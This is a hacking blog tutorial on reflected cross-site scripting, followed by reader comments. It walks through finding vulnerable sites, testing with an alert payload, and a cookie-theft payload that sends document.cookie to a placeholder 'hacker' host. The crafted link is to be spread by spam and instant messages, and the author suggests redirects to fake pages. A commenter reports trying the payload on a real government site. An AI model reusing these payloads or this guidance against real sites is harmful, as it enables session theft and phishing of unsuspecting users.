What is Cross site scripting :-
As quoted in wiky
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."
There is no single, standardized classification of cross-site scripting flaws. but most
experts distinguish between at least two primary flavors of XSS non-persistent
and persistent to know whats persistent and non persistent click here
In this tutorial i will explain about Non-Persitent attack
First of all you must find a vulnerable site .( for this you can refer
my post on How to find a vulnarable site )
my post on How to find a vulnarable site )
After finding a site enter a simple java script given bellow in the serch box or url bar
<SCRIPT>alert("XSS testing by hackhaholic.blogspot.com");
If a dialog box pops up as shown then the site it is vulnerable to xss
In the above example we added a harmless alert dialog box
In the next example i will show you how we can add more sophisticated and
dangours XSS attack to exploit users
One typical example is a simple cookie theft exploit
.
var+img=new+Image();img.src= "http://hacker/"%20+%20 document.cookie;
The previous JavaScript creates an image DOM object.
var img=new Image();
Since the JavaScript code executed within the http://victim/ context, it has access to the cookies
The image object is then redirected to hackers website where the victim cookies are stored
img.src="http://hacker/"%20+%20document.cookie;
Once the hacker has completed his exploit code, which looks like
http://victim/ context=">">+var+img=new+Image();img.src= "http://hacker/document.cookie;
Now the hacker will advertise this specially crafted link through spam e-mail , message board posts, Instant Message (IM)messages, and others, trying to attract user clicks. What makes this attack so effective is that
Users are more likely to click on the link because the URL contains the real Web site domain name, rather than a look-alike domain name address as in normal phishing
If you dont mind.. can you make it some more clearer..
REPLYI have executed the simple alert box script in a vulnerable site... but what is the effect of it?? i.e how can the victim see it?
@ Anonymous
You can by sending the url to ur victim , You can change the box to anything for (eg) u can redirect the victim to a fake page
Now the victim wont doubt because the URL contains the real Web sitedomain name !!
Read more: http://hackhaholic.blogspot.com/2010/11/how-to-hack-website-using-cross-site.html#ixzz1WtikEJbF
This is completely new information to me and surely i will these steps, Now i am going to bookmark this website.Register a Domain
REPLYThis blog Is very informative , I am really pleased to post my comment on this blog . It helped me with ocean of knowledge so I really belive you will do much better in the future . Good job web master .
REPLYI went to the same site as you (the russian federation site) to try the script out, but nothing happens when I type the script in the url?
REPLYSo it looks like this:
www.ach.gov.ru/en/bulletins/?id=730 <*CRIPT>alert("XSS testing by hackhaholic.blogspot.com");
(replace * with S)
I just get some russian text on the site :/
Whats wrong? Please help me. Thanks!
Can you teach me everything about website hacking.
REPLYPlease!!
Excellent post
REPLYphp development
Use the form below to comment. No spam please!!!